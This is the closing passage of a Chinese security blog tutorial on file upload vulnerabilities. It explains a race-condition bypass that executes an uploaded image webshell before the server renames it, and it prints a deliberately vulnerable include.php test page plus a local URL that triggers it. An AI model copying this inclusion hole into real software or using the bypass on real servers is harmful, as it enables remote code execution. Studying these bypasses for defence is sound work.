}</span><br><span class="line"></span><br><span class="line"> <span class="variable">$ret</span> = <span class="keyword">$this</span>->checkSize();</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">$this</span>->resultUpload( <span class="variable">$ret</span> ); </span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// if flag to check if the file exists is set to 1</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span>( <span class="keyword">$this</span>->cls_file_exists == <span class="number">1</span> ){</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$ret</span> = <span class="keyword">$this</span>->checkFileExists();</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">$this</span>->resultUpload( <span class="variable">$ret</span> ); </span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// if we are here, we are ready to move the file to destination</span></span><br><span class="line"></span><br><span class="line"> <span class="variable">$ret</span> = <span class="keyword">$this</span>->move();</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">$this</span>->resultUpload( <span class="variable">$ret</span> ); </span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// check if we need to rename the file</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>( <span class="keyword">$this</span>->cls_rename_file == <span class="number">1</span> ){</span><br><span class="line"> <span class="variable">$ret</span> = <span class="keyword">$this</span>->renameFile();</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">$this</span>->resultUpload( <span class="variable">$ret</span> ); </span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// if we are here, everything worked as planned :)</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">$this</span>->resultUpload( <span class="string">"SUCCESS"</span> );</span><br><span class="line"> </span><br><span class="line"> }</span><br><span class="line">......</span><br><span class="line">......</span><br><span class="line">...... </span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>上传图片马,通过条件竞争,图片马来不及改名就被上传了</p>
<p>可以在一定条件下免去查找新文件名</p>
<p>利用文件包含执行php代码</p>
<p>include.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">本页面存在文件包含漏洞,用于测试图片马是否能正常运行!</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">header(<span class="string">"Content-Type:text/html;charset=utf-8"</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$file</span>)){</span><br><span class="line"> <span class="keyword">include</span> <span class="variable">$file</span>;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> show_source(<span class="keyword">__file__</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/include.php?file=upload/xxx.jpg</span><br></pre></td></tr></table></figure><button type="button" class="tab-to-top" aria-label="scroll to top"><i class="fas fa-arrow-up"></i></button></div></div></div>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">BaiKer</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://baiker.top/0053789dab3b.html">http://baiker.top/0053789dab3b.html</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外,均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://baiker.top" target="_blank">BaiKer</a>!</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/">文件上传漏洞</a></div><div class="post_share"><div class="social-share" data-image="https://inews.gtimg.com/newsapp_ls/0/13902964058/0" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/c7d50197fdce.html"><img class="prev-cover" src="https://inews.gtimg.com/newsapp_ls/0/13902381922/0" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">jQuery库版本过低</div></div></a></div><div class="next-post pull-right"><a href="/ddf32da2222d.html"><img class="next-cover" src="https://inews.gtimg.com/newsapp_ls/0/13902959395/0" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">Windows(CVE-2019-0708)远程桌面代码执行漏洞</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>相关推荐</span></div><div class="relatedPosts-list"><div><a href="/3f4628f47a28.html" title="JBoss DeploymentScanner.addURL()文件上传漏洞"><img class="cover" src="https://baiker.top/img/wallhaven-gj977q.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-09-01</div><div class="title">JBoss DeploymentScanner.addURL()文件上传漏洞</div></div></a></div><div><a href="/013bc4e5df03.html" title="JBoss后台文件上传漏洞 - CVE-2007-1036"><img class="cover" src="https://baiker.top/img/wallhaven-gj977q.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-09-01</div><div class="title">JBoss后台文件上传漏洞 - CVE-2007-1036</div></div></a></div></div></div><hr/><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="fas fa-comments fa-fw"></i><span> 评论</span></div></div><div class="comment-wrap"><div><div class="vcomment" id="vcomment"></div></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/avatar.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">BaiKer</div><div class="author-info__description">网络安全</div></div><div class="card-info-data is-center"><div class="card-info-data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">40</div></a></div><div class="card-info-data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">22</div></a></div><div class="card-info-data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">45</div></a></div></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/baiker" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="/baiker@qq.com" target="_blank" title="Email"><i class="fas fa-envelope"></i></a></div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.</span> <span class="toc-text">文件上传漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E6%9D%A1%E4%BB%B6"><span class="toc-number">1.1.</span> <span class="toc-text">文件上传漏洞条件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A%E4%BC%A0%E6%96%87%E4%BB%B6%E5%91%BD%E5%90%8D%E8%A7%84%E5%88%99"><span class="toc-number">1.2.</span> <span class="toc-text">服务器上传文件命名规则</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="toc-number">1.3.</span> <span class="toc-text">漏洞原理</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%A3%80%E6%B5%8B%E6%96%B9%E5%BC%8F"><span class="toc-number">2.</span> <span class="toc-text">文件上传检测方式</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%A2%E6%88%B7%E7%AB%AF"><span class="toc-number">2.1.</span> <span class="toc-text">客户端</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#JS%E5%89%8D%E7%AB%AF%E8%84%9A%E6%9C%AC%E6%A3%80%E6%9F%A5"><span class="toc-number">2.1.1.</span> <span class="toc-text">JS前端脚本检查</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%8D%E5%8A%A1%E7%AB%AF"><span class="toc-number">2.2.</span> <span class="toc-text">服务端</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A3%80%E6%9F%A5%E5%90%8E%E7%BC%80"><span class="toc-number">2.2.1.</span> <span class="toc-text">检查后缀</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%99%BD%E5%90%8D%E5%8D%95"><span class="toc-number">2.2.1.1.</span> <span class="toc-text">白名单</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#MIME%E7%BB%95%E8%BF%87"><span class="toc-number">2.2.1.1.1.</span> <span class="toc-text">MIME绕过</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#00%E6%88%AA%E6%96%AD"><span class="toc-number">2.2.1.1.2.</span> <span class="toc-text">%00截断</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#0x00%E6%88%AA%E6%96%AD"><span class="toc-number">2.2.1.1.3.</span> <span class="toc-text">0x00截断</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%88%AA%E6%96%AD%E7%BB%95%E8%BF%87"><span class="toc-number">2.2.1.1.4.</span> <span class="toc-text">截断绕过</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%95%B0%E7%BB%84%E7%BB%95%E8%BF%87"><span class="toc-number">2.2.1.1.5.</span> <span class="toc-text">数组绕过</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%BB%91%E5%90%8D%E5%8D%95"><span class="toc-number">2.2.1.2.</span> <span class="toc-text">黑名单</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%B8%8A%E4%BC%A0%E7%89%B9%E6%AE%8A%E5%8F%AF%E8%A7%A3%E6%9E%90%E5%90%8E%E7%BC%80"><span class="toc-number">2.2.1.2.1.</span> <span class="toc-text">上传特殊可解析后缀</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%90%8E%E7%BC%80%E5%A4%A7%E5%B0%8F%E5%86%99%E7%BB%95%E8%BF%87"><span class="toc-number">2.2.1.2.2.</span> <span class="toc-text">后缀大小写绕过</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%82%B9%E7%BB%95%E8%BF%87"><span class="toc-number">2.2.1.2.3.</span> <span class="toc-text">点绕过</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%A9%BA%E6%A0%BC%E7%BB%95%E8%BF%87"><span class="toc-number">2.2.1.2.4.</span> <span class="toc-text">空格绕过</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#DATA%E7%BB%95%E8%BF%87"><span class="toc-number">2.2.1.2.5.</span> <span class="toc-text">::$DATA绕过</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%B7%AF%E5%BE%84%E6%8B%BC%E6%8E%A5%E7%BB%95%E8%BF%87"><span class="toc-number">2.2.1.2.6.</span> <span class="toc-text">路径拼接绕过</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%8F%8C%E5%86%99%E7%BB%95%E8%BF%87"><span class="toc-number">2.2.1.2.7.</span> <span class="toc-text">双写绕过</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%B8%8A%E4%BC%A0-htaccess"><span class="toc-number">2.2.1.2.8.</span> <span class="toc-text">上传.htaccess</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A3%80%E6%9F%A5%E5%86%85%E5%AE%B9"><span class="toc-number">2.2.2.</span> <span class="toc-text">检查内容</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%A4%B4%E6%A3%80%E6%9F%A5"><span class="toc-number">2.2.2.1.</span> <span class="toc-text">文件头检查</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AA%81%E7%A0%B4getimagesize"><span class="toc-number">2.2.2.2.</span> <span class="toc-text">突破getimagesize()</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AA%81%E7%A0%B4exif-imagetype"><span class="toc-number">2.2.2.3.</span> <span class="toc-text">突破exif_imagetype()</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BA%8C%E6%AC%A1%E6%B8%B2%E6%9F%93"><span class="toc-number">2.2.2.4.</span> <span class="toc-text">二次渲染</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81%E9%80%BB%E8%BE%91"><span class="toc-number">2.2.3.</span> <span class="toc-text">代码逻辑</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89"><span class="toc-number">2.2.3.1.</span> <span class="toc-text">条件竞争</span></a></li></ol></li></ol></li></ol></li></ol></div></div></div></div></main><footer id="footer" style="background-image: url('https://inews.gtimg.com/newsapp_ls/0/13902964058/0')"><div id="footer-wrap"><div class="copyright">©2020 - 2023 By BaiKer</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><a id="to_comment" href="#post-comment" title="直达评论"><i class="fas fa-comments"></i></a><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.js"></script><div class="js-pjax"><script>function loadValine () {
function initValine () {
const valine = new Valine(Object.assign({
el: '#vcomment',
appId: 'B4CWJLUwBNNEjD2SoNxuy03K-gzGzoHsz',
appKey: '6vo75MB0241puEkTNHhBsuv9',
avatar: 'monsterid',
serverURLs: '',
emojiMaps: "",
path: window.location.pathname,
visitor: false
}, null))
}
if (typeof Valine === 'function') initValine()
else getScript('https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js').then(initValine)
}
if ('Valine' === 'Valine' || !false) {
if (false) btf.loadComment(document.getElementById('vcomment'),loadValine)
else setTimeout(loadValine, 0)
} else {
function loadOtherComment () {
loadValine()
}
}</script></div><link rel="stylesheet" href="https://baiker.top/css/custom.css"><script id="click-heart" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/click-heart.min.js" async="async" mobile="false"></script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>